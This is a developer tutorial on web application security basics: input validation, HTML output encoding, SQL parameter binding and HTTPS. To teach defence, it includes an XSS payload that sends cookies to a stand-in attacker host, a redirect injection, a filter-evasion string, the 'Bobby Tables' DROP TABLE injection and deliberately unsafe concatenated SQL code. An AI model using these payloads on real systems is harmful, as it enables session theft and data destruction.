Modern web development has many challenges, and of those security is both very important and often under-emphasized. While such techniques as threat analysis are increasingly recognized as essential to any serious development, there are also some basic practices which every developer can and should be doing as a matter of course.

Contents

- Trust

- Reject Unexpected Form Input

- Encode HTML Output

- Bind Parameters for Database Queries

- Protect Data in Transit

The modern software developer has to be something of a Swiss Army knife. Of course, you need to write code that fulfills customer functional requirements. It needs to be fast. Further, you are expected to write this code to be comprehensible and extensible: sufficiently flexible to allow for the evolutionary nature of IT demands, but stable and reliable. You need to be able to lay out a usable interface, optimize a database, and often set up and maintain a delivery pipeline. You need to be able to get these things done by yesterday.

Somewhere, way down at the bottom of the list of requirements, behind fast, cheap, and flexible, is “secure”. That is, until something goes wrong, until the system you build is compromised; then suddenly security is, and always was, the most important thing.

Security is a cross-functional concern a bit like Performance. And a bit unlike Performance. Like Performance, our business owners often know they need Security, but aren’t always sure how to quantify it. Unlike Performance, they often don’t know “secure enough” when they see it.

So how can a developer work in a world of vague security requirements and unknown threats? Advocating for defining those requirements and identifying those threats is a worthy exercise, but one that takes time and therefore money. Much of the time, developers will operate in the absence of specific security requirements. While their organization grapples with finding ways to introduce security concerns into the requirements intake processes, they will still build systems and write code.

In this Evolving Publication, we will:

- point out common areas in a web application where developers need to be particularly conscious of security risks

- provide guidance for how to address each risk on common web stacks

- highlight common mistakes developers make, and how to avoid them

Security is a massive topic, even if we reduce the scope to only browser-based web applications. These articles will be closer to a “best-of” than a comprehensive catalog of everything you need to know, but we hope they will provide a directed first step for developers who are trying to ramp up fast.

Trust

Before jumping into the nuts and bolts of input and output, it’s worth mentioning one of the most crucial underlying principles of security: trust. We have to ask ourselves: do we trust the integrity of the request coming in from the user’s browser? (hint: we don’t). Do we trust that upstream services have done the work to make our data clean and safe? (hint: nope). Do we trust that the connection between the user’s browser and our application cannot be tampered with? (hint: not completely…). Do we trust the services and data stores we depend on? (hint: we might…)

Of course, like security, trust is not binary, and we need to assess our risk tolerance, the criticality of our data, and how much we need to invest to feel comfortable with how we have managed our risk. In order to do that in a disciplined way, we probably need to go through threat and risk modeling processes, but that’s a complicated topic to be addressed in another article. For now, suffice it to say that we will identify a series of risks to our system, and now that they are identified, we will have to address the threats that arise.

Reject Unexpected Form Input

HTML forms can create the illusion of controlling input. The form markup author might believe that, because they are restricting the types of values that a user can enter in the form, the data will conform to those restrictions. But rest assured, it is no more than an illusion. Even client-side JavaScript form validation provides absolutely no value from a security perspective.

Untrusted Input

On our scale of trust, data coming from the user’s browser ranks at effectively zero, whether we are providing the form or not, and regardless of whether the connection is HTTPS-protected. The user could very easily modify the markup before sending it, or use a command line application like curl to submit unexpected data. Or a perfectly innocent user could be unwittingly submitting a modified version of a form from a hostile website. Same Origin Policy doesn’t prevent a hostile site from submitting to your form handling endpoint. In order to ensure the integrity of incoming data, validation needs to be handled on the server.

But why is malformed data a security concern? Depending on your application logic and use of output encoding, you are inviting the possibility of unexpected behavior, leaking data, and even providing an attacker with a way of breaking the boundaries of input data into executable code.

For example, imagine that we have a form with a radio button that allows the user to select a communication preference. Our form handling code has application logic with different behavior depending on those values.

final String communicationType = req.getParameter("communicationType");

if ("email".equals(communicationType)) {

sendByEmail();

} else if ("text".equals(communicationType)) {

sendByText();

} else {

sendError(resp, format("Can't send by type %s", communicationType));

}

This code may or may not be dangerous, depending on how the sendError method is implemented. We are trusting that downstream logic processes untrusted content correctly. It might. But it might not. We’re much better off if we can eliminate the possibility of unanticipated control flow entirely.

So what can a developer do to minimize the danger that untrusted input will have undesirable effects in application code? Enter input validation.

Input Validation

Input validation is the process of ensuring input data is consistent with application expectations. Data that falls outside of an expected set of values can cause our application to yield unexpected results, for example violating business logic, triggering faults, and even allowing an attacker to take control of resources or the application itself. Input that is evaluated on the server as executable code, such as a database query, or executed on the client as HTML or JavaScript is particularly dangerous. Validating input is an important first line of defense to protect against this risk.

Developers often build applications with at least some basic input validation, for example to ensure a value is non-null or an integer is positive. Thinking about how to further limit input to only logically acceptable values is the next step toward reducing risk of attack.

Input validation is more effective for inputs that can be restricted to a small set. Numeric types can typically be restricted to values within a specific range. For example, it doesn’t make sense for a user to request to transfer a negative amount of money or to add several thousand items to their shopping cart. This strategy of limiting input to known acceptable types is known as positive validation or whitelisting. A whitelist could restrict input to a string of a specific form such as a URL or a date of the form “yyyy/mm/dd”. It could limit input length, require a single acceptable character encoding, or, for the example above, accept only the values that are available in your form.
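The kinds of whitelist rules described above can be sketched in a few lines of Java. This is only an illustration under stated assumptions: the class name FormRules, the upper limit of 100 items, and the method names are hypothetical, and a real application would more likely declare these constraints through its framework’s validation support.

```java
import java.time.LocalDate;
import java.time.format.DateTimeFormatter;
import java.time.format.DateTimeParseException;
import java.time.format.ResolverStyle;
import java.util.Set;

final class FormRules {
    // Hypothetical limits and field values, chosen only for illustration.
    private static final int MAX_QUANTITY = 100;
    private static final Set<String> COMMUNICATION_TYPES = Set.of("email", "text");

    // STRICT resolution rejects impossible dates such as February 30th.
    private static final DateTimeFormatter DATE =
            DateTimeFormatter.ofPattern("uuuu/MM/dd").withResolverStyle(ResolverStyle.STRICT);

    // Numeric input is accepted only inside a known range.
    static boolean isValidQuantity(int quantity) {
        return quantity >= 1 && quantity <= MAX_QUANTITY;
    }

    // Date input must have the exact length and form yyyy/mm/dd.
    static boolean isValidDate(String value) {
        if (value == null || value.length() != 10) {
            return false;
        }
        try {
            LocalDate.parse(value, DATE);
            return true;
        } catch (DateTimeParseException e) {
            return false;
        }
    }

    // Radio-button input must be one of the values the form actually offers.
    static boolean isValidCommunicationType(String value) {
        return value != null && COMMUNICATION_TYPES.contains(value);
    }
}
```

Each check answers only “is this inside the contract?” and leaves the decision about how to reject the request to the caller.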

Another way of thinking of input validation is that it is enforcement of the contract your form handling code has with its consumer. Anything violating that contract is invalid and therefore rejected. The more restrictive your contract, the more aggressively it is enforced, the less likely your application is to fall prey to security vulnerabilities that arise from unanticipated conditions.

You are going to have to make a choice about exactly what to do when input fails validation. The most restrictive and, arguably, most desirable choice is to reject it entirely, without feedback, and make sure the incident is noted through logging or monitoring. But why without feedback? Should we provide our user with information about why the data is invalid? It depends a bit on your contract. In the form example above, if you receive any value other than “email” or “text”, something funny is going on: you either have a bug or you are being attacked. Further, the feedback mechanism might provide the point of attack. Imagine the sendError method writes the text back to the screen as an error message like “We’re unable to respond with communicationType”. That’s all fine if the communicationType is “carrier pigeon”, but what happens if it looks like this?

<script>new Image().src = 'http://evil.martinfowler.com/steal?' + document.cookie</script>

You’re now faced with the possibility of a reflected XSS attack that steals session cookies. If you must provide user feedback, you are best served with a canned response that doesn’t echo back untrusted user data, for example “You must choose email or text”. If you really can’t avoid rendering the user’s input back at them, make absolutely sure it’s properly encoded (see below for details on output encoding).
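A canned response might look something like the following sketch. The class PreferenceHandler, the logger name, and the success message are hypothetical; the point is only that the rejected value is never copied into the response, and that the incident is still recorded.

```java
import java.util.Set;
import java.util.logging.Logger;

final class PreferenceHandler {
    // Hypothetical logger name; use whatever your monitoring expects.
    private static final Logger LOG = Logger.getLogger("security.validation");
    private static final Set<String> ALLOWED = Set.of("email", "text");

    static final String CANNED_ERROR = "You must choose email or text";

    // Returns the message to show the user; it never contains the submitted value.
    static String respond(String communicationType) {
        if (communicationType == null || !ALLOWED.contains(communicationType)) {
            // Record the incident without writing the raw, untrusted value into the log.
            int length = communicationType == null ? 0 : communicationType.length();
            LOG.warning("Rejected communicationType (length " + length + ")");
            return CANNED_ERROR;
        }
        return "Preference saved";
    }
}
```

Logging only the length of the rejected value is a deliberately conservative choice here, since log files are another place where untrusted text can cause trouble.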

In Practice

It might be tempting to try filtering the <script> tag to thwart this attack. Rejecting input that contains known dangerous values is a strategy referred to as negative validation or blacklisting. The trouble with this approach is that the number of possible bad inputs is extremely large. Maintaining a complete list of potentially dangerous input would be a costly and time-consuming endeavor, and the list would need to be continually updated. But sometimes it’s your only option, for example in cases of free-form input. If you must blacklist, be very careful to cover all your cases, write good tests, be as restrictive as you can, and reference OWASP’s XSS Filter Evasion Cheat Sheet to learn common methods attackers will use to circumvent your protections.

Resist the temptation to filter out invalid input. This is a practice commonly called “sanitization”. It is essentially a blacklist that removes undesirable input rather than rejecting it. Like other blacklists, it is hard to get right and provides the attacker with more opportunities to evade it. For example, imagine, in the case above, you choose to filter out <script> tags. An attacker could bypass it with something as simple as:

<scr<script>ipt>

Even though your blacklist caught the attack, by fixing it, you just reintroduced the vulnerability.
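The bypass is easy to reproduce. The following is a minimal sketch of a deliberately flawed sanitizer (NaiveSanitizer and stripScriptTags are hypothetical names) that removes every literal <script> in a single pass:

```java
final class NaiveSanitizer {
    // Deliberately flawed: removes each literal "<script>" in one left-to-right pass.
    static String stripScriptTags(String input) {
        return input.replace("<script>", "");
    }
}
```

Calling NaiveSanitizer.stripScriptTags("<scr<script>ipt>") returns "<script>": removing the inner tag joins the surrounding fragments into exactly the tag the filter was meant to stop.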

Input validation functionality is built into most modern frameworks and, when absent, can also be found in external libraries that let the developer apply multiple constraints as rules on a per-field basis. Built-in validation of common patterns like email addresses and credit card numbers is a helpful bonus. Using your web framework’s validation provides the additional advantage of pushing the validation logic to the very edge of the web tier, causing invalid data to be rejected before it ever reaches complex application code where critical mistakes are easier to make.

| Framework | Approaches |
|---|---|
| Java | Hibernate (Bean Validation); ESAPI |
| Spring | Built-in type safe params in Controller; built-in Validator interface (Bean Validation) |
| Ruby on Rails | Built-in Active Record Validators |
| ASP.NET | Built-in Validation (see BaseValidator) |
| Play | Built-in Validator |
| Generic JavaScript | xss-filters |
| NodeJS | validator-js |
| General | Regex-based validation on application inputs |

In Summary

- Whitelist when you can

- Blacklist when you can’t whitelist

- Keep your contract as restrictive as possible

- Make sure you alert about the possible attack

- Avoid reflecting input back to a user

- Reject the web content before it gets deeper into application logic to minimize ways to mishandle untrusted data or, even better, use your web framework to whitelist input

Although this section focused on using input validation as a mechanism for protecting your form handling code, any code that handles input from an untrusted source can be validated in much the same way, whether the message is JSON, XML, or any other format, and regardless of whether it’s a cookie, a header, or URL parameter string. Remember: if you don’t control it, you can’t trust it. If it violates the contract, reject it!

Encode HTML Output

In addition to limiting data coming into an application, web application developers need to pay close attention to the data as it comes out. A modern web application usually has basic HTML markup for document structure, CSS for document style, JavaScript for application logic, and user-generated content which can be any of these things. It’s all text. And it’s often all rendered to the same document.

An HTML document is really a collection of nested execution contexts separated by tags, like <script> or <style>. The developer is always one errant angle bracket away from running in a very different execution context than they intend. This is further complicated when you have additional context-specific content embedded within an execution context. For example, both HTML and JavaScript can contain a URL, each with rules all their own.

Output Risks

HTML is a very, very permissive format. Browsers try their best to render the content, even if it is malformed. That may seem beneficial to the developer since a bad bracket doesn’t just explode in an error, however, the rendering of badly formed markup is a major source of vulnerabilities. Attackers have the luxury of injecting content into your pages to break through execution contexts, without even having to worry about whether the page is valid.

Handling output correctly isn’t strictly a security concern. Applications rendering data from sources like databases and upstream services need to ensure that the content doesn’t break the application, but risk becomes particularly high when rendering content from an untrusted source. As mentioned in the prior section, developers should be rejecting input that falls outside the bounds of the contract, but what do we do when we need to accept input containing characters that have the potential to change our code, like a single quote (“'“) or open bracket (“<“)? This is where output encoding comes in.

Output Encoding

Output encoding is converting outgoing data to a final output format. The complication with output encoding is that you need a different codec depending on how the outgoing data is going to be consumed. Without appropriate output encoding, an application could provide its client with misformatted data making it unusable, or even worse, dangerous. An attacker who stumbles across insufficient or inappropriate encoding knows that they have a potential vulnerability that might allow them to fundamentally alter the structure of the output from the intent of the developer.
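To make the idea of a context-specific codec concrete, here is a minimal sketch of an encoder for HTML text and attribute content. HtmlEncoder is a hypothetical name, and the sketch covers only the five characters that most commonly change HTML structure; it is meant to show the mechanism, not to replace the encoder that ships with your framework.

```java
final class HtmlEncoder {
    // Replaces characters that carry structural meaning in HTML with entity references.
    static String encode(String raw) {
        StringBuilder out = new StringBuilder(raw.length() + 16);
        for (int i = 0; i < raw.length(); i++) {
            char c = raw.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```

Output from this encoder is suitable for an HTML context only. The same string placed inside a script block or a URL needs a different codec.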

For example, imagine that one of the first customers of a system is the former Supreme Court Justice Sandra Day O’Connor. What happens if her name is rendered into HTML?

<p>The Honorable Justice Sandra Day O'Connor</p>

renders as:

The Honorable Justice Sandra Day O'Connor

All is right with the world. The page is generated as we would expect. But this could be a fancy dynamic UI with a model/view/controller architecture. These strings are going to show up in JavaScript, too. What happens when the page outputs this to the browser?

document.getElementById('name').innerText = 'Sandra Day O'Connor' //<--unescaped string

The result is malformed JavaScript. This is what hackers look for to break through execution context and turn innocent data into dangerous executable code. If the Justice enters her name as

Sandra Day O';window.location='http://evil.martinfowler.com/';

suddenly our user has been pushed to a hostile site. If, however, we correctly encode the output for a JavaScript context, the text will look like this:

'Sandra Day O\';window.location=\'http://evil.martinfowler.com/\';'

A bit confusing, perhaps, but a perfectly harmless, non-executable string. Note: there are a couple of strategies for encoding JavaScript. This particular encoding uses escape sequences to represent the apostrophe (“\'”), but it could also be represented safely with the Unicode escape sequence (“\u0027”).
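The Unicode-escape strategy is simple to sketch. The encoder below (JsStringEncoder is a hypothetical name) keeps ASCII letters and digits and writes every other character as a four-digit Unicode escape, so nothing in the data can close the surrounding string literal. It is a conservative illustration, assuming the result is placed inside a quoted JavaScript string, and not a substitute for a maintained encoding library.

```java
final class JsStringEncoder {
    // Keeps ASCII letters and digits; everything else becomes a four-digit Unicode escape.
    static String encode(String raw) {
        StringBuilder out = new StringBuilder(raw.length() * 2);
        for (int i = 0; i < raw.length(); i++) {
            char c = raw.charAt(i);
            boolean alphanumeric = (c >= 'a' && c <= 'z')
                    || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9');
            if (alphanumeric) {
                out.append(c);
            } else {
                // Each UTF-16 code unit is written as a backslash, the letter u, and four hex digits.
                out.append(String.format("\\u%04x", (int) c));
            }
        }
        return out.toString();
    }
}
```

Encoding far more characters than strictly necessary makes the output harder to read, but it avoids having to reason about which punctuation is dangerous in which position.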

The good news is that most modern web frameworks have mechanisms for rendering content safely and escaping reserved characters. The bad news is that most of these frameworks include a mechanism for circumventing this protection and developers often use them either due to ignorance or because they are relying on them to render executable code that they believe to be safe.

Cautions and Caveats

There are so many tools and frameworks these days, and so many encoding contexts (e.g. HTML, XML, JavaScript, PDF, CSS, SQL, etc.), that creating a comprehensive list is infeasible. However, below is a starter for what to use and avoid for encoding HTML in some common frameworks.

If you are using another framework, check the documentation for safe output encoding functions. If the framework doesn’t have them, consider changing frameworks to something that does, or you’ll have the unenviable task of creating output encoding code on your own. Also note that just because a framework renders HTML safely doesn’t mean it’s going to render JavaScript or PDFs safely. You need to be aware of which context a particular encoding tool is written for.

Be warned: you might be tempted to take the raw user input, and do the encoding before storing it. This pattern will generally bite you later on. If you were to encode the text as HTML prior to storage, you can run into problems if you need to render the data in another format: it can force you to unencode the HTML, and re-encode into the new output format. This adds a great deal of complexity and encourages developers to write code in their application to unescape the content, making all the tricky upstream output encoding effectively useless. You are much better off storing the data in its most raw form, then handling encoding at rendering time.

Finally, it’s worth noting that nested rendering contexts add an enormous amount of complexity and should be avoided whenever possible. It’s hard enough to get a single output string right, but when you are rendering a URL, in HTML within JavaScript, you have three contexts to worry about for a single string. If you absolutely cannot avoid nested contexts, make sure to decompose the problem into separate stages and thoroughly test each one, paying special attention to order of rendering. OWASP provides some guidance for this situation in the DOM based XSS Prevention Cheat Sheet.
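As a small illustration of staging, here is a sketch with two nested contexts instead of three: a user-supplied value placed in a URL query parameter, with the URL then placed in an HTML attribute. LinkRenderer, the /search path, and the lang parameter are hypothetical. The innermost context is encoded first, and the outer context is encoded last.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

final class LinkRenderer {
    static String searchLink(String query) {
        // Stage 1 (innermost context): the value becomes a URL query parameter.
        String url = "/search?q=" + URLEncoder.encode(query, StandardCharsets.UTF_8) + "&lang=en";
        // Stage 2 (outer context): the whole URL becomes an HTML attribute value.
        return "<a href=\"" + escapeHtmlAttribute(url) + "\">Search</a>";
    }

    // Minimal attribute escaping; the ampersand is replaced first so later entities stay intact.
    static String escapeHtmlAttribute(String raw) {
        return raw.replace("&", "&amp;")
                  .replace("<", "&lt;")
                  .replace(">", "&gt;")
                  .replace("\"", "&quot;")
                  .replace("'", "&#39;");
    }
}
```

Swapping the two stages would HTML-encode the raw value and then percent-encode the entities, producing a link that carries the wrong data, which is why each stage deserves its own tests.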

| Framework | Encoded | Dangerous |
|---|---|---|
| Generic JS | innerText | innerHTML |
| JQuery | text() | html() |
| HandleBars | {{variable}} | {{{variable}}} |
| ERB | <%= variable %> | raw(variable) |
| JSP | <c:out value="${variable}"> or ${fn:escapeXml(variable)} | ${variable} |
| Thymeleaf | th:text="${variable}" | th:utext="${variable}" |
| Freemarker | ${variable} (in escape directive) | <#noescape> or ${variable} without an escape directive |
| Angular | ng-bind | ng-bind-html (pre 1.2 and when sceProvider is disabled) |

In Summary

- Output encode all application data on output with an appropriate codec

- Use your framework’s output encoding capability, if available

- Avoid nested rendering contexts as much as possible

- Store your data in raw form and encode at rendering time

- Avoid unsafe framework and JavaScript calls that bypass encoding

Bind Parameters for Database Queries

Whether you are writing SQL against a relational database, using an object-relational mapping framework, or querying a NoSQL database, you probably need to worry about how input data is used within your queries.

The database is often the most crucial part of any web application since it contains state that can’t be easily restored. It can contain crucial and sensitive customer information that must be protected. It is the data that drives the application and runs the business. So you would expect developers to take the most care when interacting with their database, and yet injection into the database tier continues to plague the modern web application even though it’s relatively easy to prevent!



Little Bobby Tables

No discussion of parameter binding would be complete without including the famous 2007 “Little Bobby Tables” issue of xkcd:

To decompose this comic, imagine the system responsible for keeping track of grades has a function for adding new students:

void addStudent(String lastName, String firstName) {

String query = "INSERT INTO students (last_name, first_name) VALUES ('"

+ lastName + "', '" + firstName + "')";

getConnection().createStatement().execute(query);

}

If addStudent is called with parameters “Fowler”, “Martin”, the resulting SQL is:

INSERT INTO students (last_name, first_name) VALUES ('Fowler', 'Martin')

But with Little Bobby’s name the following SQL is executed:

INSERT INTO students (last_name, first_name) VALUES ('XKCD', 'Robert'); DROP TABLE Students;-- ')

In fact, two commands are executed:

INSERT INTO students (last_name, first_name) VALUES ('XKCD', 'Robert')

DROP TABLE Students

The final “--” comments out the remainder of the original query, ensuring the SQL syntax is valid. Et voilà, the DROP is executed. This attack vector allows the user to execute arbitrary SQL within the context of the application’s database user. In other words, the attacker can do anything the application can do and more, which could result in attacks that cause greater harm than a DROP, including violating data integrity, exposing sensitive information or inserting executable code. Later we will talk about defining different users as a secondary defense against this kind of mistake, but for now, suffice to say that there is a very simple application-level strategy for minimizing injection risk.
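The effect of concatenation can be observed without a database by building only the query text. In this sketch, InjectionDemo and buildInsert are hypothetical names, and the method mirrors the string construction in addStudent without executing anything:

```java
final class InjectionDemo {
    // Mirrors the string construction in addStudent; nothing is sent to a database.
    static String buildInsert(String lastName, String firstName) {
        return "INSERT INTO students (last_name, first_name) VALUES ('"
                + lastName + "', '" + firstName + "')";
    }
}
```

Passing "Robert'); DROP TABLE Students;-- " as the first name yields a string containing two statements, because the apostrophe in the data ends the SQL string literal early.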

Parameter Binding to the Rescue

To quibble with Hacker Mom’s solution, sanitizing is very difficult to get right, creates new potential attack vectors and is certainly not the right approach. Your best, and arguably only decent, option is parameter binding. JDBC, for example, provides the PreparedStatement.setXXX() methods for this very purpose. Parameter binding provides a means of separating executable code, such as SQL, from content, transparently handling content encoding and escaping.

void addStudent(String lastName, String firstName) {

PreparedStatement stmt = getConnection().prepareStatement("INSERT INTO students (last_name, first_name) VALUES (?, ?)");

stmt.setString(1, lastName);

stmt.setString(2, firstName);

stmt.execute();

}

Any full-featured data access layer will have the ability to bind variables and defer implementation to the underlying protocol. This way, the developer doesn’t need to understand the complexities that arise from mixing user input with executable code. For this to be effective all untrusted inputs need to be bound. If SQL is built through concatenation, interpolation, or formatting methods, none of the resulting string should be created from user input.

Clean and Safe Code

Sometimes we encounter situations where there is tension between good security and clean code. Security sometimes requires the programmer to add some complexity in order to protect the application. In this case however, we have one of those fortuitous situations where good security and good design are aligned. In addition to protecting the application from injection, introducing bound parameters improves comprehensibility by providing clear boundaries between code and content, and simplifies creating valid SQL by eliminating the need to manage the quotes by hand.

As you introduce parameter binding to replace your string formatting or concatenation, you may also find opportunities to introduce generalized binding functions to the code, further enhancing code cleanliness and security. This highlights another place where good design and good security overlap: de-duplication leads to additional testability, and reduction of complexity.
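One possible shape for such a generalized binding function is sketched below. Binder and bindAll are hypothetical names. The helper relies on the standard JDBC method PreparedStatement.setObject and binds each value to its positional placeholder, so callers never assemble SQL text from input.

```java
import java.sql.PreparedStatement;
import java.sql.SQLException;

final class Binder {
    // Binds each value to the placeholder at the same position (JDBC indexes start at 1).
    static void bindAll(PreparedStatement stmt, Object... params) throws SQLException {
        for (int i = 0; i < params.length; i++) {
            stmt.setObject(i + 1, params[i]);
        }
    }
}
```

With a helper like this, addStudent could prepare its INSERT statement once and call Binder.bindAll(stmt, lastName, firstName) before executing it. How setObject maps Java types to SQL types depends on the driver, so typed setters may still be preferable for some columns.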

Common Misconceptions

There is a misconception that stored procedures prevent SQL injection, but that is only true insofar as parameters are bound inside the stored procedure. If the stored procedure itself does string concatenation it can be injectable as well, and binding the variable from the client won’t save you.

Similarly, object-relational mapping frameworks like ActiveRecord, Hibernate, or .NET Entity Framework, won’t protect you unless you are using binding functions. If you are building your queries using untrusted input without binding, the app still could be vulnerable to an injection attack.

For more detail on the injection risks of stored procedures and ORMs, see security analyst Troy Hunt’s article “Stored procedures and ORMs won’t save you from SQL injection”.

Finally, there is a misconception that NoSQL databases are not susceptible to injection attack, and that is not true. All query languages, SQL or otherwise, require a clear separation between executable code and content so the execution doesn’t confuse the command with the parameter. Attackers look for points in the runtime where they can break through those boundaries and use input data to change the intended execution path. Even MongoDB, which uses a binary wire protocol and language-specific API, reducing opportunities for text-based injection attacks, exposes the “$where” operator which is vulnerable to injection, as is demonstrated in this article from the OWASP Testing Guide. The bottom line is that you need to check the data store and driver documentation for safe ways to handle input data.

Parameter Binding Functions

Check the matrix below for an indication of the safe binding functions for your chosen data store. If it is not included in this list, check the product documentation.

| Framework | Safe | Dangerous |
|---|---|---|
| Raw JDBC | Connection.prepareStatement() used with setXXX() methods and bound parameters for all input. | Any query or update method called with string concatenation rather than binding. |
| PHP / MySQLi | prepare() used with bind_param for all input. | Any query or update method called with string concatenation rather than binding. |
| MongoDB | Basic CRUD operations such as find(), insert(), with BSON document field names controlled by application. | Operations, including find, when field names are allowed to be determined by untrusted data or use of Mongo operations such as “$where” that allow arbitrary JavaScript conditions. |
| Cassandra | Session.prepare used with BoundStatement and bound parameters for all input. | Any query or update method called with string concatenation rather than binding. |
| Hibernate / JPA | Use SQL or JPQL/OQL with bound parameters via setParameter | Any query or update method called with string concatenation rather than binding. |
| ActiveRecord | Condition functions (find_by, where) if used with hashes or bound parameters, e.g. where(foo: bar) or where("foo = ?", bar) | Condition functions used with string concatenation or interpolation, e.g. where("foo = '#{bar}'") or where("foo = '" + bar + "'") |

In Summary

- Avoid building SQL (or NoSQL equivalent) from user input

- Bind all parameterized data, both queries and stored procedures

- Use the native driver binding function rather than trying to handle the encoding yourself

- Don’t think stored procedures or ORM tools will save you. You need to use binding functions for those, too

- NoSQL doesn’t make you injection-proof

Protect Data in Transit

While we’re on the subject of input and output, there’s another important consideration: the privacy and integrity of data in transit. When using an ordinary HTTP connection, users are exposed to many risks arising from the fact that data is transmitted in plaintext. An attacker capable of intercepting network traffic anywhere between a user’s browser and a server can eavesdrop or even tamper with the data completely undetected in a man-in-the-middle attack. There is little limit to what the attacker can do, including stealing the user’s session or their personal information, injecting malicious code that will be executed by the browser in the context of the website, or altering data the user is sending to the server.

We can’t usually control the network our users choose to use. They very well might be using a network where anyone can easily watch their traffic, such as an open wireless network in a café or on an airplane. They might have unsuspectingly connected to a hostile wireless network with a name like “Free Wi-Fi” set up by an attacker in a public place. They might be using an internet provider that injects content such as ads into their web traffic, or they might even be in a country where the government routinely surveils its citizens.

If an attacker can eavesdrop on a user or tamper with web traffic, all bets are off. The data exchanged cannot be trusted by either side. Fortunately for us, we can protect against many of these risks with HTTPS.

HTTPS and Transport Layer Security

HTTPS was originally used mainly to secure sensitive web traffic such as financial transactions, but it is now common to see it used by default on many sites we use in our day to day lives such as social networking and search engines. The HTTPS protocol uses the Transport Layer Security (TLS) protocol, the successor to the Secure Sockets Layer (SSL) protocol, to secure communications. When configured and used correctly, it provides protection against eavesdropping and tampering, along with a reasonable guarantee that a website is the one we intend to be using. Or, in more technical terms, it provides confidentiality and data integrity, along with authentication of the website’s identity.

With the many risks we all face, it increasingly makes sense to treat all network traffic as sensitive and encrypt it. When dealing with web traffic, this is done using HTTPS. Several browser makers have announced their intent to deprecate non-secure HTTP and even display visual indications to users to warn them when a site is not using HTTPS. Most HTTP/2 implementations in browsers will only support communicating over TLS. So why aren’t we using it for everything now?

There have been some hurdles that impeded adoption of HTTPS. For a long time, it was perceived as being too computationally expensive to use for all traffic, but with modern hardware that has not been the case for some time. The SSL protocol and early versions of the TLS protocol only supported the use of one web site certificate per IP address, but that restriction was lifted in TLS with the introduction of a protocol extension called SNI (Server Name Indication), which is now supported in most browsers. The cost of obtaining a certificate from a certificate authority also deterred adoption, but the introduction of free services like Let’s Encrypt has eliminated that barrier. Today there are fewer hurdles than ever before.

Get a Server Certificate

The ability to authenticate the identity of a website underpins the security of TLS. In the absence of the ability to verify that a site is who it says it is, an attacker capable of doing a man-in-the-middle attack could impersonate the site and undermine any other protection the protocol provides.

When using TLS, a site proves its identity using a public key certificate. This certificate contains information about the site along with a public key that is used to prove that the site is the owner of the certificate, which it does using a corresponding private key that only it knows. In some systems a client may also be required to use a certificate to prove its identity, although this is relatively rare in practice today due to complexities in managing certificates for clients.

Unless the certificate for a site is known in advance, a client needs some way to verify that the certificate can be trusted. This is done based on a model of trust. In web browsers and many other applications, a trusted third party called a Certificate Authority (CA) is relied upon to verify the identity of a site and sometimes of the organization that owns it, then grant a signed certificate to the site to certify it has been verified.
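To make the CA trust model concrete from the client's side, here is a minimal sketch using Python's standard `ssl` module. It assumes the client relies on the operating system's store of trusted CAs; the function name `make_client_context` is ours, chosen for illustration.

```python
import ssl


def make_client_context() -> ssl.SSLContext:
    """Build a client-side TLS context that relies on trusted CAs."""
    # create_default_context() loads the platform's trusted CA certificates
    # and enables both certificate verification and hostname checking.
    return ssl.create_default_context()


context = make_client_context()
# The server must present a certificate that chains to a trusted CA...
print(context.verify_mode == ssl.CERT_REQUIRED)
# ...and the certificate must match the host name being contacted.
print(context.check_hostname)
```

A connection wrapped with this context fails during the handshake if the site's certificate was not signed by a CA the client trusts, or if it was issued for a different host name.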

It isn’t always necessary to involve a trusted third party if the certificate is known in advance by sharing it through some other channel. For example, a mobile app or other application might be distributed with a certificate or information about a custom CA that will be used to verify the identity of the site. This practice is referred to as certificate or public key pinning and is outside the scope of this article.

The most visible indicator of security that many web browsers display is when communications with a site are secured using HTTPS and the certificate is trusted. Without it, a browser will display a warning about the certificate and prevent a user from viewing your site, so it is important to get a certificate from a trusted CA.

It is possible to generate your own certificate to test an HTTPS configuration, but you will need a certificate signed by a trusted CA before exposing the service to users. For many uses, a free CA is a good starting point. When searching for a CA, you will encounter different levels of certification offered. The most basic, Domain Validation (DV), certifies that the owner of the certificate controls a domain. More costly options are Organization Validation (OV) and Extended Validation (EV), which involve the CA doing additional checks to verify the organization requesting the certificate. Although the more advanced options result in a more positive visual indicator of security in the browser, they may not be worth the extra cost for many.

Configure Your Server

With a certificate in hand, you can begin to configure your server to support HTTPS. At first glance, this may seem like a task worthy of someone who holds a PhD in cryptography. You may want to choose a configuration that supports a wide range of browser versions, but you need to balance that with providing a high level of security and maintaining some level of performance.

The cryptographic algorithms and protocol versions supported by a site have a strong impact on the level of communications security it provides. Attacks with impressive sounding names like FREAK and DROWN and POODLE (admittedly, the last one doesn’t sound all that formidable) have shown us that supporting dated protocol versions and algorithms presents a risk of browsers being tricked into using the weakest option supported by a server, making an attack much easier. Advancements in computing power and our understanding of the mathematics underlying algorithms also render them less safe over time. How can we balance staying up to date with making sure our website remains compatible for a broad assortment of users who might be using dated browsers that only support older protocol versions and algorithms?

Fortunately, there are tools that help make the job of selection a lot easier. Mozilla has a helpful SSL Configuration Generator to generate recommended configurations for various web servers, along with a complementary Server Side TLS Guide with more in-depth details.

Note that the configuration generator mentioned above enables a browser security feature called HSTS by default, which might cause problems until you’re ready to commit to using HTTPS for all communications long term. We’ll discuss HSTS a little later in this article.
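As a small illustration of what "dropping dated protocol versions" looks like in practice, the sketch below configures a server-side TLS context with Python's standard `ssl` module. The choice of TLS 1.2 as the floor is an assumption made for the example, not a recommendation from the tools above; consult the generator for settings appropriate to your server and audience.

```python
import ssl


def make_server_context() -> ssl.SSLContext:
    """Build a server-side TLS context that refuses dated protocol versions."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # Assumption for this sketch: clients older than TLS 1.2 are not supported.
    # Handshakes attempting SSLv3, TLS 1.0, or TLS 1.1 will be rejected.
    context.minimum_version = ssl.TLSVersion.TLSv1_2
    # A real server would also load its certificate and private key here,
    # for example with context.load_cert_chain(certfile, keyfile).
    return context


context = make_server_context()
print(context.minimum_version == ssl.TLSVersion.TLSv1_2)
```

Raising the minimum version narrows the set of options an attacker can downgrade a connection to, at the cost of excluding clients that cannot negotiate anything newer.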

Use HTTPS for Everything

